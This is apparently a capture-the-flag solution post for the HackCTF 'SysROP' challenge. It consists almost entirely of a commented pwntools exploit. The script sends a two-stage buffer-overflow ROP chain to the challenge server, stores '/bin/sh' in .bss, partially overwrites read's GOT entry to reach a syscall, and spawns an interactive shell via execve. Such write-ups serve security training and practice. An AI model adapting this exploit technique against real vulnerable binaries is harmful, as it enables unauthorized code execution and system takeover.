ii4gsp
HackCTF - SysROP
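```python
from pwn import *

r = remote('ctf.j0n9hyun.xyz', 3024)
e = ELF('./sysrop')
libc = ELF('./libc.so.6')

# Stage 1: read(0, bss + 0x100, 8) stores "/bin/sh\0" in .bss, then control
# goes back to 0x4005f2 so the overflow can be triggered a second time.
payload = b''
payload += b'\x90' * (0x10 + 0x8)     # padding up to the saved return address
payload += p64(0x00000000004005eb)    # gadget; the next three values are used as rdx, rdi, rsi
payload += p64(8)                     # rdx = 8 (length)
payload += p64(0)                     # rdi = 0 (stdin)
payload += p64(e.bss() + 0x100)       # rsi = destination buffer
payload += p64(e.plt['read'])
payload += p64(0x4005f2)              # re-enter the program for the second payload
r.sendline(payload)
sleep(0.1)
r.send(b'/bin/sh\x00')
sleep(0.1)

# Stage 2: read(0, read@got, 1) replaces the lowest byte of read's GOT entry.
# The following read@plt call then lands at the patched address with rax = 59
# (execve on x86-64) and rdi pointing at the "/bin/sh" string from stage 1.
payload = b''
payload += b'\x90' * (0x10 + 0x8)
payload += p64(0x00000000004005eb)    # same gadget: rdx, rdi, rsi
payload += p64(1)                     # rdx = 1 (overwrite a single byte)
payload += p64(0)                     # rdi = 0 (stdin)
payload += p64(e.got['read'])         # rsi = read's GOT entry
payload += p64(e.plt['read'])
payload += p64(0x00000000004005ea)    # one byte earlier: also loads rax first
payload += p64(59)                    # rax = 59 (execve)
payload += p64(0x0)                   # rdx = 0 (envp)
payload += p64(e.bss() + 0x100)       # rdi = address of "/bin/sh"
payload += p64(0x0)                   # rsi = 0 (argv)
payload += p64(e.plt['read'])         # jumps through the patched GOT entry
r.sendline(payload)
sleep(0.1)
r.send(b'\x5e')                       # new low byte for read's GOT entry
sleep(0.1)

r.interactive()
```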
Exploit